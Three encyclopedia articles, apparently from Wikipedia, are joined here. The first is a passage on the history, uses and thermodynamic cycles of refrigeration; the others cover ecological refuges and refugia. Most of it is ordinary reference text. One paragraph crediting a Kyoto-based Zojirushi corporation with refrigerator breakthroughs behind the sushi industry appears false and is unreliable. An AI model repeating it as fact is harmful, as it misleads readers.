By the 1890s, refrigeration played a vital role in the distribution of food. The meat-packing industry relied heavily on natural ice in the 1880s and continued to rely on manufactured ice as those technologies became available. [ 32 ] By 1900, the meat-packing houses of Chicago had adopted ammonia-cycle commercial refrigeration. By 1914, almost every location used artificial refrigeration. The major meat packers , Armour, Swift, and Wilson, had purchased the most expensive units which they installed on train cars and in branch houses and storage facilities in the more remote distribution areas.
By the middle of the 20th century, refrigeration units were designed for installation on trucks or lorries. Refrigerated vehicles are used to transport perishable goods, such as frozen foods, fruit and vegetables, and temperature-sensitive chemicals. Most modern refrigerators keep the temperature between –40 and –20 °C, and have a maximum payload of around 24,000 kg gross weight (in Europe).
Although commercial refrigeration quickly progressed, it had limitations that prevented it from moving into the household. First, most refrigerators were far too large. Some of the commercial units being used in 1910 weighed between five and two hundred tons. Second, commercial refrigerators were expensive to produce, purchase, and maintain. Lastly, these refrigerators were unsafe. It was not uncommon for commercial refrigerators to catch fire, explode, or leak toxic gases. Refrigeration did not become a household technology until these three challenges were overcome. [ 33 ]
During the early 1800s, consumers preserved their food by storing food and ice purchased from ice harvesters in iceboxes. In 1803, Thomas Moore patented a metal-lined butter-storage tub which became the prototype for most iceboxes. These iceboxes were used until nearly 1910 and the technology did not progress. In fact, consumers that used the icebox in 1910 faced the same challenge of a moldy and stinky icebox that consumers had in the early 1800s. [ 34 ]
General Electric (GE) was one of the first companies to overcome these challenges. In 1911, GE released a household refrigeration unit that was powered by gas. The use of gas eliminated the need for an electric compressor motor and decreased the size of the refrigerator. However, electric companies that were customers of GE did not benefit from a gas-powered unit. Thus, GE invested in developing an electric model. In 1927, GE released the Monitor Top, the first refrigerator to run on electricity. [ 35 ]
In 1930, Frigidaire, one of GE's main competitors, synthesized Freon . [ 36 ] With the invention of synthetic refrigerants based mostly on a chlorofluorocarbon (CFC) chemical, safer refrigerators were possible for home and consumer use. Freon led to the development of smaller, lighter, and cheaper refrigerators. The average price of a refrigerator dropped from $275 to $154 with the synthesis of Freon. This lower price allowed ownership of refrigerators in American households to exceed 50% by 1940. [ 37 ] Freon is a trademark of the DuPont Corporation and refers to these CFCs, and later hydro chlorofluorocarbon (HCFC) and hydro fluorocarbon (HFC), refrigerants developed in the late 1920s. These refrigerants were considered — at the time — to be less harmful than the commonly-used refrigerants of the time, including methyl formate, ammonia, methyl chloride, and sulfur dioxide. The intent was to provide refrigeration equipment for home use without danger. These CFC refrigerants answered that need. In the 1970s, though, the compounds were found to be reacting with atmospheric ozone, an important protection against solar ultraviolet radiation, and their use as a refrigerant worldwide was curtailed in the Montreal Protocol of 1987.
In the last century, refrigeration allowed new settlement patterns to emerge. This new technology has allowed for new areas to be settled that are not on a natural channel of transport such as a river, valley trail or harbor that may have otherwise not been settled. Refrigeration has given opportunities to early settlers to expand westward and into rural areas that were unpopulated. These new settlers with rich and untapped soil saw opportunity to profit by sending raw goods to the eastern cities and states. In the 20th century, refrigeration has made "Galactic Cities" such as Dallas, Phoenix, and Los Angeles possible.
The refrigerated rail car ( refrigerated van or refrigerator car ), along with the dense railroad network, became an exceedingly important link between the marketplace and the farm allowing for a national opportunity rather than a just a regional one. Before the invention of the refrigerated rail car, it was impossible to ship perishable food products long distances. The beef packing industry made the first demand push for refrigeration cars. The railroad companies were slow to adopt this new invention because of their heavy investments in cattle cars, stockyards, and feedlots. [ 38 ] Refrigeration cars were also complex and costly compared to other rail cars, which also slowed the adoption of the refrigerated rail car. After the slow adoption of the refrigerated car, the beef packing industry dominated the refrigerated rail car business with their ability to control ice plants and the setting of icing fees. The United States Department of Agriculture estimated that, in 1916, over sixty-nine percent of the cattle killed in the country was done in plants involved in interstate trade. The same companies that were also involved in the meat trade later implemented refrigerated transport to include vegetables and fruit. The meat packing companies had much of the expensive machinery, such as refrigerated cars, and cold storage facilities that allowed for them to effectively distribute all types of perishable goods. During World War I, a national refrigerator car pool was established by the United States Administration to deal with problem of idle cars and was later continued after the war. [ 39 ] The idle car problem was the problem of refrigeration cars sitting pointlessly in between seasonal harvests. This meant that very expensive cars sat in rail yards for a good portion of the year while making no revenue for the car's owner. The car pool was a system where cars were distributed to areas as crops matured ensuring maximum use of the cars. Refrigerated rail cars moved eastward from vineyards, orchards, fields, and gardens in western states to satisfy Americas consuming market in the east. [ 40 ] The refrigerated car made it possible to transport perishable crops hundreds and even thousands of kilometres or miles. The most noticeable effect the car gave was a regional specialization of vegetables and fruits. The refrigeration rail car was widely used for the transportation of perishable goods up until the 1950s. By the 1960s, the nation's interstate highway system was adequately complete allowing for trucks to carry the majority of the perishable food loads and to push out the old system of the refrigerated rail cars. [ 41 ]
The widespread use of refrigeration allowed for a vast amount of new agricultural opportunities to open up in the United States. New markets emerged throughout the United States in areas that were previously uninhabited and far-removed from heavily populated areas. New agricultural opportunity presented itself in areas that were considered rural, such as states in the south and in the west. Shipments on a large scale from the south and California were both made around the same time, although natural ice was used from the Sierras in California rather than manufactured ice in the south. [ 42 ] Refrigeration allowed for many areas to specialize in the growing of specific fruits. California specialized in several fruits, grapes, peaches, pears, plums, and apples, while Georgia became famous for specifically its peaches. In California, the acceptance of the refrigerated rail cars led to an increase of car loads from 4,500 carloads in 1895 to between 8,000 and 10,000 carloads in 1905. [ 43 ] The Gulf States, Arkansas, Missouri and Tennessee entered into strawberry production on a large-scale while Mississippi became the center of the tomato industry . New Mexico, Colorado, Arizona, and Nevada grew cantaloupes. Without refrigeration, this would have not been possible. By 1917, well-established fruit and vegetable areas that were close to eastern markets felt the pressure of competition from these distant specialized centers. [ 44 ] Refrigeration was not limited to meat, fruit and vegetables but it also encompassed dairy product and dairy farms. In the early twentieth century, large cities got their dairy supply from farms as far as 640 kilometres (400 mi). Dairy products were not as easily transported over great distances like fruits and vegetables due to greater perishability. Refrigeration made production possible in the west far from eastern markets, so much in fact that dairy farmers could pay transportation cost and still undersell their eastern competitors. [ 45 ] Refrigeration and the refrigerated rail gave opportunity to areas with rich soil far from natural channel of transport such as a river, valley trail or harbors. [ 46 ]
"Edge city" was a term coined by Joel Garreau , whereas the term "galactic city" was coined by Lewis Mumford . These terms refer to a concentration of business, shopping, and entertainment outside a traditional downtown or central business district in what had previously been a residential or rural area. There were several factors contributing to the growth of these cities such as Los Angeles, Las Vegas, Houston, and Phoenix. The factors that contributed to these large cities include reliable automobiles, highway systems, refrigeration, and agricultural production increases. Large cities such as the ones mentioned above have not been uncommon in history, but what separates these cities from the rest are that these cities are not along some natural channel of transport, or at some crossroad of two or more channels such as a trail, harbor, mountain, river, or valley. These large cities have been developed in areas that only a few hundred years ago would have been uninhabitable. Without a cost efficient way of cooling air and transporting water and food from great distances, these large cities would have never developed. The rapid growth of these cities was influenced by refrigeration and an agricultural productivity increase, allowing more distant farms to effectively feed the population. [ 46 ]
Agriculture's role in developed countries has drastically changed in the last century due to many factors, including refrigeration. Statistics from the 2007 census gives information on the large concentration of agricultural sales coming from a small portion of the existing farms in the United States today. This is a partial result of the market created for the frozen meat trade by the first successful shipment of frozen sheep carcasses coming from New Zealand in the 1880s. As the market continued to grow, regulations on food processing and quality began to be enforced. Eventually, electricity was introduced into rural homes in the United States, which allowed refrigeration technology to continue to expand on the farm, increasing output per person. Today, refrigeration's use on the farm reduces humidity levels, avoids spoiling due to bacterial growth, and assists in preservation.
The introduction of refrigeration and evolution of additional technologies drastically changed agriculture in the United States. During the beginning of the 20th century, farming was a common occupation and lifestyle for United States citizens, as most farmers actually lived on their farm. In 1935, there were 6.8 million farms in the United States and a population of 127 million. Yet, while the United States population has continued to climb, citizens pursuing agriculture continue to decline. Based on the 2007 US Census, less than one percent of a population of 310 million people claim farming as an occupation today. However, the increasing population has led to an increasing demand for agricultural products, which is met through a greater variety of crops, fertilizers, pesticides, and improved technology. Improved technology has decreased the risk and time involved for agricultural management and allows larger farms to increase their output per person to meet society's demand. [ 47 ]
Prior to 1882, the South Island of New Zealand had been experimenting with sowing grass and crossbreeding sheep, which immediately gave their farmers economic potential in the exportation of meat. In 1882, the first successful shipment of sheep carcasses was sent from Port Chalmers in Dunedin , New Zealand, to London . By the 1890s, the frozen meat trade became increasingly more profitable in New Zealand, especially in Canterbury , where 50% of exported sheep carcasses came from in 1900. It was not long before Canterbury meat was known for the highest quality, creating a demand for New Zealand meat around the world. In order to meet this new demand, the farmers improved their feed so sheep could be ready for the slaughter in only seven months. This new method of shipping led to an economic boom in New Zealand by the mid 1890s. [ 48 ]
In the United States, the Meat Inspection Act of 1891 was put in place in the United States because local butchers felt the refrigerated railcar system was unwholesome. [ 49 ] When meat packing began to take off, consumers became nervous about the quality of the meat for consumption. Upton Sinclair 's 1906 novel The Jungle brought negative attention to the meat packing industry, by drawing to light unsanitary working conditions and processing of diseased animals. The book caught the attention of President Theodore Roosevelt , and the 1906 Meat Inspection Act was put into place as an amendment to the Meat Inspection Act of 1891. This new act focused on the quality of the meat and environment it is processed in. [ 50 ]
In the early 1930s, 90 percent of the urban population of the United States had electric power , in comparison to only 10 percent of rural homes. At the time, power companies did not feel that extending power to rural areas ( rural electrification ) would produce enough profit to make it worth their while. However, in the midst of the Great Depression , President Franklin D. Roosevelt realized that rural areas would continue to lag behind urban areas in both poverty and production if they were not electrically wired. On May 11, 1935, the president signed an executive order called the Rural Electrification Administration , also known as REA. The agency provided loans to fund electric infrastructure in the rural areas. In just a few years, 300,000 people in rural areas of the United States had received power in their homes.
While electricity dramatically improved working conditions on farms, it also had a large impact on the safety of food production. Refrigeration systems were introduced to the farming and food distribution processes, which helped in food preservation and kept food supplies safe . Refrigeration also allowed for shipment of perishable commodities throughout the United States. As a result, United States farmers quickly became the most productive in the world, [ 51 ] and entire new food systems arose.
In order to reduce humidity levels and spoiling due to bacterial growth, refrigeration is used for meat, produce, and dairy processing in farming today. Refrigeration systems are used the heaviest in the warmer months for farming produce, which must be cooled as soon as possible in order to meet quality standards and increase the shelf life. Meanwhile, dairy farms refrigerate milk year round to avoid spoiling. [ 52 ]
In the late 19th Century and into the very early 20th Century, except for staple foods (sugar, rice, and beans) that needed no refrigeration, the available foods were affected heavily by the seasons and what could be grown locally. [ 53 ] [ 54 ] Refrigeration has removed these limitations. Refrigeration played a large part in the feasibility and then popularity of the modern supermarket. Fruits and vegetables out of season, or grown in distant locations, are now available at relatively low prices. Refrigerators have led to a huge increase in meat and dairy products as a portion of overall supermarket sales. [ 55 ] As well as changing the goods purchased at the market, the ability to store these foods for extended periods of time has led to an increase in leisure time. [ citation needed ] Prior to the advent of the household refrigerator, people would have to shop on a daily basis for the supplies needed for their meals. [ 56 ] [ 57 ]
The introduction of refrigeration allowed for the hygienic handling and storage of perishables, [ 58 ] and as such, promoted output growth, consumption, and the availability of nutrition. The change in our method of food preservation moved us away from salts to a more manageable sodium level. The ability to move and store perishables such as meat and dairy led to a 1.7% increase in dairy consumption and overall protein intake by 1.25% annually in the US after the 1890s. [ 59 ]
People were not only consuming these perishables because it became easier for they themselves to store them, but because the innovations in refrigerated transportation and storage led to less spoilage and waste, thereby driving the prices of these products down. Refrigeration accounts for at least 5.1% of the increase in adult stature (in the US) through improved nutrition, [ 60 ] [ 61 ] and when the indirect effects associated with improvements in the quality of nutrients and the reduction in illness is additionally factored in, the overall impact becomes considerably larger. [ 59 ] Recent studies have also shown a negative relationship between the number of refrigerators in a household and the rate of gastric cancer mortality. [ 62 ]
Probably the most widely used current applications of refrigeration are for air conditioning of private homes and public buildings, and refrigerating foodstuffs in homes, restaurants and large storage warehouses. The use of refrigerators and walk-in coolers and freezers in kitchens, factories and warehouses [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] for storing and processing fruits and vegetables has allowed adding fresh salads to the modern diet year round, and storing fish and meats safely for long periods.
The optimum temperature range for perishable food storage is 3 to 5 °C (37 to 41 °F). [ 68 ]
In commerce and manufacturing, there are many uses for refrigeration. Refrigeration is used to liquefy gases – oxygen , nitrogen , propane , and methane , for example. In compressed air purification, it is used to condense water vapor from compressed air to reduce its moisture content. In oil refineries , chemical plants , and petrochemical plants, refrigeration is used to maintain certain processes at their needed low temperatures (for example, in alkylation of butenes and butane to produce a high- octane gasoline component). Metal workers use refrigeration to temper steel and cutlery. When transporting temperature-sensitive foodstuffs and other materials by trucks, trains, airplanes and seagoing vessels, refrigeration is a necessity.
Dairy products are constantly in need of refrigeration, [ 8 ] [ 69 ] and it was only discovered in the past few decades that eggs needed to be refrigerated during shipment rather than waiting to be refrigerated after arrival at the grocery store. Meats, poultry and fish all must be kept in climate-controlled environments before being sold. [ 70 ] Refrigeration also helps keep fruits and vegetables edible longer. [ 70 ]
One of the most influential uses of refrigeration was in the development of the sushi / sashimi industry in Japan. [ 71 ] [ 72 ] Before the discovery of refrigeration, many sushi connoisseurs were at risk of contracting diseases. The dangers of unrefrigerated sashimi were not brought to light for decades due to the lack of research and healthcare distribution across rural Japan. Around mid-century, the Zojirushi corporation, based in Kyoto, made breakthroughs in refrigerator designs, making refrigerators cheaper and more accessible for restaurant proprietors and the general public.
Methods of refrigeration can be classified as non-cyclic , cyclic , thermoelectric and magnetic .
This refrigeration method cools a contained area by melting ice, or by sublimating dry ice . [ 73 ] Perhaps the simplest example of this is a portable cooler, where items are put in it, then ice is poured over the top. Regular ice can maintain temperatures near, but not below the freezing point, unless salt is used to cool the ice down further (as in a traditional ice-cream maker ). Dry ice can reliably bring the temperature well below water freezing point.
This consists of a refrigeration cycle, where heat is removed from a low-temperature space or source and rejected to a high-temperature sink with the help of external work, and its inverse, the thermodynamic power cycle . In the power cycle, heat is supplied from a high-temperature source to the engine, part of the heat being used to produce work and the rest being rejected to a low-temperature sink. This satisfies the second law of thermodynamics .
A refrigeration cycle describes the changes that take place in the refrigerant as it alternately absorbs and rejects heat as it circulates through a refrigerator . It is also applied to heating, ventilation, and air conditioning HVACR work, when describing the "process" of refrigerant flow through an HVACR unit, whether it is a packaged or split system.
Heat naturally flows from hot to cold. Work is applied to cool a living space or storage volume by pumping heat from a lower temperature heat source into a higher temperature heat sink. Insulation is used to reduce the work and energy needed to achieve and maintain a lower temperature in the cooled space. The operating principle of the refrigeration cycle was described mathematically by Sadi Carnot in 1824 as a heat engine .
The most common types of refrigeration systems use the reverse-Rankine vapor-compression refrigeration cycle, although absorption heat pumps are used in a minority of applications.
Cyclic refrigeration can be classified as:
Vapor cycle refrigeration can further be classified as:
The vapor-compression cycle is used in most household refrigerators as well as in many large commercial and industrial refrigeration systems. Figure 1 provides a schematic diagram of the components of a typical vapor-compression refrigeration system.
The thermodynamics of the cycle can be analyzed on a diagram [ 74 ] as shown in Figure 2. In this cycle, a circulating refrigerant such as a low boiling hydrocarbon or hydrofluorocarbons enters the compressor as a vapour. From point 1 to point 2, the vapor is compressed at constant entropy and exits the compressor as a vapor at a higher temperature, but still below the vapor pressure at that temperature. From point 2 to point 3 and on to point 4, the vapor travels through the condenser which cools the vapour until it starts condensing, and then condenses the vapor into a liquid by removing additional heat at constant pressure and temperature. Between points 4 and 5, the liquid refrigerant goes through the expansion valve (also called a throttle valve) where its pressure abruptly decreases, causing flash evaporation and auto-refrigeration of, typically, less than half of the liquid.
That results in a mixture of liquid and vapour at a lower temperature and pressure as shown at point 5. The cold liquid-vapor mixture then travels through the evaporator coil or tubes and is completely vaporized by cooling the warm air (from the space being refrigerated) being blown by a fan across the evaporator coil or tubes. The resulting refrigerant vapour returns to the compressor inlet at point 1 to complete the thermodynamic cycle.
The above discussion is based on the ideal vapour-compression refrigeration cycle, and does not take into account real-world effects like frictional pressure drop in the system, slight thermodynamic irreversibility during the compression of the refrigerant vapor, or non-ideal gas behavior, if any. Vapor compression refrigerators can be arranged in two stages in cascade refrigeration systems, with the second stage cooling the condenser of the first stage. This can be used for achieving very low temperatures.
More information about the design and performance of vapor-compression refrigeration systems is available in the classic Perry's Chemical Engineers' Handbook . [ 75 ]
In the early years of the twentieth century, the vapor absorption cycle using water-ammonia systems or LiBr -water was popular and widely used. After the development of the vapor compression cycle, the vapor absorption cycle lost much of its importance because of its low coefficient of performance (about one fifth of that of the vapor compression cycle). Today, the vapor absorption cycle is used mainly where fuel for heating is available but electricity is not, such as in recreational vehicles that carry LP gas . It is also used in industrial environments where plentiful waste heat overcomes its inefficiency.
The absorption cycle is similar to the compression cycle, except for the method of raising the pressure of the refrigerant vapor. In the absorption system, the compressor is replaced by an absorber which dissolves the refrigerant in a suitable liquid, a liquid pump which raises the pressure and a generator which, on heat addition, drives off the refrigerant vapor from the high-pressure liquid. Some work is needed by the liquid pump but, for a given quantity of refrigerant, it is much smaller than needed by the compressor in the vapor compression cycle. In an absorption refrigerator, a suitable combination of refrigerant and absorbent is used. The most common combinations are ammonia (refrigerant) with water (absorbent), and water (refrigerant) with lithium bromide (absorbent).
The main difference with absorption cycle, is that in adsorption cycle, the refrigerant (adsorbate) could be ammonia, water, methanol , etc., while the adsorbent is a solid, such as silica gel , activated carbon , or zeolite , unlike in the absorption cycle where absorbent is liquid.
The reason adsorption refrigeration technology has been extensively researched in recent 30 years lies in that the operation of an adsorption refrigeration system is often noiseless, non-corrosive and environment friendly. [ 76 ]
When the working fluid is a gas that is compressed and expanded but does not change phase, the refrigeration cycle is called a gas cycle . Air is most often this working fluid. As there is no condensation and evaporation intended in a gas cycle, components corresponding to the condenser and evaporator in a vapor compression cycle are the hot and cold gas-to-gas heat exchangers in gas cycles.
The gas cycle is less efficient than the vapor compression cycle because the gas cycle works on the reverse Brayton cycle instead of the reverse Rankine cycle . As such, the working fluid does not receive and reject heat at constant temperature. In the gas cycle, the refrigeration effect is equal to the product of the specific heat of the gas and the rise in temperature of the gas in the low temperature side. Therefore, for the same cooling load, a gas refrigeration cycle needs a large mass flow rate and is bulky.
Because of their lower efficiency and larger bulk, air cycle coolers are not often used nowadays in terrestrial cooling devices. However, the air cycle machine is very common on gas turbine -powered jet aircraft as cooling and ventilation units, because compressed air is readily available from the engines' compressor sections. Such units also serve the purpose of pressurizing the aircraft.
Thermoelectric cooling uses the Peltier effect to create a heat flux between the junction of two types of material. [ 77 ] This effect is commonly used in camping and portable coolers and for cooling electronic components [ 78 ] and small instruments. Peltier coolers are often used where a traditional vapor-compression cycle refrigerator would be impractical or take up too much space, and in cooled image sensors as an easy, compact and lightweight, if inefficient, way to achieve very low temperatures, using two or more stage peltier coolers arranged in a cascade refrigeration configuration, meaning that two or more Peltier elements are stacked on top of each other, with each stage being larger than the one before it, [ 79 ] [ 80 ] [ 81 ] in order to extract more heat and waste heat generated by the previous stages. Peltier cooling has a low COP (efficiency) when compared with that of the vapor-compression cycle, so it emits more waste heat (heat generated by the Peltier element or cooling mechanism) and consumes more power for a given cooling capacity. [ 82 ]
Magnetic refrigeration, or adiabatic demagnetization , is a cooling technology based on the magnetocaloric effect, an intrinsic property of magnetic solids. The refrigerant is often a paramagnetic salt , such as cerium magnesium nitrate . The active magnetic dipoles in this case are those of the electron shells of the paramagnetic atoms.
A strong magnetic field is applied to the refrigerant, forcing its various magnetic dipoles to align and putting these degrees of freedom of the refrigerant into a state of lowered entropy . A heat sink then absorbs the heat released by the refrigerant due to its loss of entropy. Thermal contact with the heat sink is then broken so that the system is insulated, and the magnetic field is switched off. This increases the heat capacity of the refrigerant, thus decreasing its temperature below the temperature of the heat sink.
Because few materials exhibit the needed properties at room temperature, applications have so far been limited to cryogenics and research.
Other methods of refrigeration include the air cycle machine used in aircraft; the vortex tube used for spot cooling, when compressed air is available; and thermoacoustic refrigeration using sound waves in a pressurized gas to drive heat transfer and heat exchange; steam jet cooling popular in the early 1930s for air conditioning large buildings; thermoelastic cooling using a smart metal alloy stretching and relaxing. Many Stirling cycle heat engines can be run backwards to act as a refrigerator, and therefore these engines have a niche use in cryogenics . In addition, there are other types of cryocoolers such as Gifford-McMahon coolers, Joule-Thomson coolers, pulse-tube refrigerators and, for temperatures between 2 mK and 500 mK, dilution refrigerators .
Another potential solid-state refrigeration technique and a relatively new area of study comes from a special property of super elastic materials. These materials undergo a temperature change when experiencing an applied mechanical stress (called the elastocaloric effect). Since super elastic materials deform reversibly at high strains , the material experiences a flattened elastic region in its stress-strain curve caused by a resulting phase transformation from an austenitic to a martensitic crystal phase.
When a super elastic material experiences a stress in the austenitic phase, it undergoes an exothermic phase transformation to the martensitic phase, which causes the material to heat up. Removing the stress reverses the process, restores the material to its austenitic phase, and absorbs heat from the surroundings cooling down the material.
The most appealing part of this research is how potentially energy efficient and environmentally friendly this cooling technology is. The different materials used, commonly shape-memory alloys , provide a non-toxic source of emission free refrigeration. The most commonly studied materials studied are shape-memory alloys, like nitinol and Cu-Zn-Al. Nitinol is of the more promising alloys with output heat at about 66 J/cm 3 and a temperature change of about 16–20 K. [ 83 ] Due to the difficulty in manufacturing some of the shape memory alloys, alternative materials like natural rubber have been studied. Even though rubber may not give off as much heat per volume (12 J/cm 3 ) as the shape memory alloys, it still generates a comparable temperature change of about 12 K and operates at a suitable temperature range, low stresses, and low cost. [ 84 ]
The main challenge however comes from potential energy losses in the form of hysteresis , often associated with this process. Since most of these losses comes from incompatibilities between the two phases, proper alloy tuning is necessary to reduce losses and increase reversibility and efficiency . Balancing the transformation strain of the material with the energy losses enables a large elastocaloric effect to occur and potentially a new alternative for refrigeration. [ 85 ]
The Fridge Gate method is a theoretical application of using a single logic gate to drive a refrigerator in the most energy efficient way possible without violating the laws of thermodynamics. It operates on the fact that there are two energy states in which a particle can exist: the ground state and the excited state. The excited state carries a little more energy than the ground state, small enough so that the transition occurs with high probability. There are three components or particle types associated with the fridge gate. The first is on the interior of the refrigerator, the second on the outside and the third is connected to a power supply which heats up every so often that it can reach the E state and replenish the source. In the cooling step on the inside of the refrigerator, the g state particle absorbs energy from ambient particles, cooling them, and itself jumping to the e state. In the second step, on the outside of the refrigerator where the particles are also at an e state, the particle falls to the g state, releasing energy and heating the outside particles. In the third and final step, the power supply moves a particle at the e state, and when it falls to the g state it induces an energy-neutral swap where the interior e particle is replaced by a new g particle, restarting the cycle. [ 86 ]
When combining a passive daytime radiative cooling system with thermal insulation and evaporative cooling , one study found a 300% increase in ambient cooling power when compared to a stand-alone radiative cooling surface, which could extend the shelf life of food by 40% in humid climates and 200% in desert climates without refrigeration. The system's evaporative cooling layer would require water "re-charges" every 10 days to a month in humid areas and every 4 days in hot and dry areas. [ 87 ]
The refrigeration capacity of a refrigeration system is the product of the evaporators ' enthalpy rise and the evaporators' mass flow rate . The measured capacity of refrigeration is often dimensioned in the unit of kW or BTU/h. Domestic and commercial refrigerators may be rated in kJ/s, or Btu/h of cooling. For commercial and industrial refrigeration systems, the kilowatt (kW) is the basic unit of refrigeration, except in North America, where both ton of refrigeration and BTU/h are used.
A refrigeration system's coefficient of performance (CoP) is very important in determining a system's overall efficiency. It is defined as refrigeration capacity in kW divided by the energy input in kW. While CoP is a very simple measure of performance, it is typically not used for industrial refrigeration in North America. Owners and manufacturers of these systems typically use performance factor (PF). A system's PF is defined as a system's energy input in horsepower divided by its refrigeration capacity in TR . Both CoP and PF can be applied to either the entire system or to system components. For example, an individual compressor can be rated by comparing the energy needed to run the compressor versus the expected refrigeration capacity based on inlet volume flow rate. It is important to note that both CoP and PF for a refrigeration system are only defined at specific operating conditions, including temperatures and thermal loads. Moving away from the specified operating conditions can dramatically change a system's performance.
Air conditioning systems used in residential application typically use SEER (Seasonal Energy Efficiency Ratio)for the energy performance rating. [ 88 ] Air conditioning systems for commercial application often use EER ( Energy Efficiency Ratio ) and IEER (Integrated Energy Efficiency Ratio) for the energy efficiency performance rating. [ 89 ] | https://en.wikipedia.org/wiki/Refrigeration |
A refuge is a concept in ecology , in which an organism obtains protection from predation by hiding in an area where it is inaccessible or cannot easily be found. Due to population dynamics , when refuges are available, populations of both predators and prey are significantly higher, [ 1 ] [ 2 ] and significantly more species can be supported in an area. [ 3 ] [ 4 ]
Coral reefs provide the most dramatic demonstration of the ecological effects of refuges. [ 5 ] [ 6 ] Refuge-rich coral reefs contain a full 25% of ocean species, even though such reefs make up just 0.1% of the ocean's surface area. [ 7 ] [ 8 ] [ 9 ] [ 10 ] On the other hand, in the sunlight-illuminated open ocean just offshore, there are no places to hide from predation, and both diversity and quantities of organisms per unit area is much lower. [ 11 ] Additionally, coral reefs enhance non-local diversity by providing spawning grounds and a refuge habitat for juvenile fishes that will live in the open ocean as adults. [ 12 ]
Rainforest species diversity is also in large part the result of diverse and numerous physical refuges. [ 13 ]
Prey animals typically maintain larger populations when they have a place to physically hide from predation. For example, rats maintain a higher population density if the rats have refuges such as tall grass, allowing them to hide from predators such as owls and cats. [ 14 ] Sea birds often have nesting colonies on islands but not on nearby, apparently suitable, mainland sites. The islands lack the mammalian predators found on the mainland, such as cats, dogs, and rats, all of which typically decimate seabird colonies. [ 15 ] Semiaquatic animals, e.g. mouse-deer , may use bodies of water as refuges. [ 16 ]
Game reserves have been deliberately used to enhance the total population of large game , e.g. deer, for at least a century. [ 17 ] Limiting hunting by humans in a relatively small area allows the overall population to rebound. [ 18 ] The same principle applies to fisheries, which produce more fish when there is a nearby refuge from human predation in the form of a nature reserve , resulting in higher catches than if the whole area was open to fishing. [ 19 ] [ 20 ] [ 21 ] In human-managed systems like these, heavily hunted areas act as a sink in which animals die faster than they reproduce, but are replaced by animals migrating from the protected nature reserve area. [ 22 ]
Many prey animals systematically migrate between refuges and predator-rich feeding grounds, in patterns that minimize their chances of being caught by the predators.
The largest such migration by biomass is the oceans' diel vertical migration , in which vast quantities of organisms hide in the lightless depths of the open ocean, arising after dark to consume phytoplankton . [ 23 ] This allows them to avoid the large predatory fish of the open ocean, as these predators are primarily visual hunters and need light to effectively catch prey. Similar types of migration also occur in fresh water. For example, small European perch exhibit a daily horizontal migration in some lakes in Finland. During the day they move away from the vegetated areas where the predation threat in the clear water is great, into more turbid open water areas, moving back at night because of the greater availability of zooplankton among the aquatic plants. [ 24 ]
Refuge use reduces the likelihood of species extinction. [ 6 ] There have been a number of mass extinction events . During some of these, denizens of the deep ocean have been relatively immune. The coelacanth for example, is a remnant species of a once common group of fishes, the Sarcopterygii , which disappeared from shallow seas at the time of the Cretaceous–Paleogene extinction event 66 million years ago, leaving only a couple of surviving species. [ 25 ] [ 26 ] Many coral taxa have used the deep ocean as a refuge, shifting from shallow to deep water and vice versa during their evolutionary history. [ 27 ] By developing wings and taking flight, insects exploited the air as a refuge, a place of safety from ground-based predators; this successful evolutionary strategy set the insects on the path to occupying the dominant position they hold today. [ 28 ]
Human societies show a similar effect, with remote mountainous regions such as Zomia or the Scottish Highlands serving as refugia , allowing their inhabitants to maintain cultural traditions and languages that were being pushed to extinction in more accessible locations. [ 29 ] [ 30 ]
Refuge from predators often depends on the size of the prey, meaning that individuals under or over a specific size cannot be consumed by the predator.
The small individuals are more likely to be able to tuck themselves away in some hole or cranny, or if, like barnacles , they are living on an exposed surface, are of negligible interest to predators like starfish because of their small size. Another example is the tidepool sculpin , which takes refuge in small rockpools when the tide is out, thus taking advantage of its small size and avoiding its larger fish predators. [ 31 ]
Large individuals may escape predators by being too large to be consumed, or their size allowing them to inhabit areas free of predators. Often larger individuals can still be consumed by predators, but the predator will prefer small prey as these require less work ( handling ) and the predator is less likely to get hurt by small individuals. Leading to a larger return on investment. An example is the rock lobster which can consume large individuals of the pink-lipped topshell , but will preferentially consume small individuals when given the choice. [ 32 ] Some barnacles escape predators by settling further up the shore, away from predators. There the starfish cannot reach them when the tide is out, nor can whelks drill through their shells because they remain submerged for insufficient time during each tidal cycle. [ 33 ] In this situation, size is a refuge in itself, in that it enables the barnacle to escape desiccation under circumstances that might be lethal to smaller individuals. [ 33 ] | https://en.wikipedia.org/wiki/Refuge_(ecology) |
In biology, a refugium (plural: refugia ) is a location which supports an isolated or relict population of a once more widespread species. This isolation ( allopatry ) can be due to climatic changes, geography, or human activities such as deforestation and overhunting.
Present examples of refugial animal species are the mountain gorilla , isolated to specific mountains in central Africa, and the Australian sea lion , isolated to specific breeding beaches along the south-west coast of Australia, due to humans taking so many of their number as game. This resulting isolation, in many cases, can be seen as only a temporary state; however, some refugia may be longstanding, thereby having many endemic species , not found elsewhere, which survive as relict populations. The Indo-Pacific Warm Pool has been proposed to be a longstanding refugium, based on the discovery of the "living fossil" of a marine dinoflagellate called Dapsilidinium pastielsii , currently found only in the Indo-Pacific Warm Pool. [ 1 ]
For plants, anthropogenic climate change propels scientific interest in identifying refugial species that were isolated into small or disjunct ranges during glacial episodes of the Pleistocene , yet whose ability to expand their ranges during the warmth of interglacial periods (such as the Holocene ) was apparently limited or precluded by topographic , streamflow , or habitat barriers [ 2 ] [ 3 ] [ 4 ] —or by the extinction of coevolved animal dispersers . [ 5 ] The concern is that ongoing warming trends will expose them to extirpation or extinction in the decades ahead. [ 6 ] [ 7 ]
In anthropology , refugia often refers specifically to Last Glacial Maximum refugia , where some ancestral human populations may have been forced back to glacial refugia (similar small isolated pockets on the face of the continental ice sheets ) during the last glacial period . Going from west to east, suggested examples include the Franco-Cantabrian region (in northern Iberia ), the Italian and Balkan peninsulas, the Ukrainian LGM refuge , and the Bering Land Bridge . Archaeological and genetic data suggest that the source populations of Paleolithic humans survived the glacial maxima (including the Last Glacial Maximum ) in sparsely wooded areas and dispersed through areas of high primary productivity while avoiding dense forest cover . [ 8 ] Glacial refugia, where human populations found refuge during the last glacial period, may have played a crucial role in shaping the emergence and diversification of the language families that exist in the world today. [ 9 ]
More recently, refugia has been used to refer to areas that could offer relative climate stability in the face of modern climate change . [ 10 ]
As an example of a locale refugia study, Jürgen Haffer first proposed the concept of refugia to explain the biological diversity of bird populations in the Amazonian river basin . Haffer suggested that climatic change in the late Pleistocene led to reduced reservoirs of habitable forests in which populations become allopatric. Over time, that led to speciation : populations of the same species that found themselves in different refugia evolved differently, creating parapatric sister-species . As the Pleistocene ended, the arid conditions gave way to the present humid rainforest environment, reconnecting the refugia.
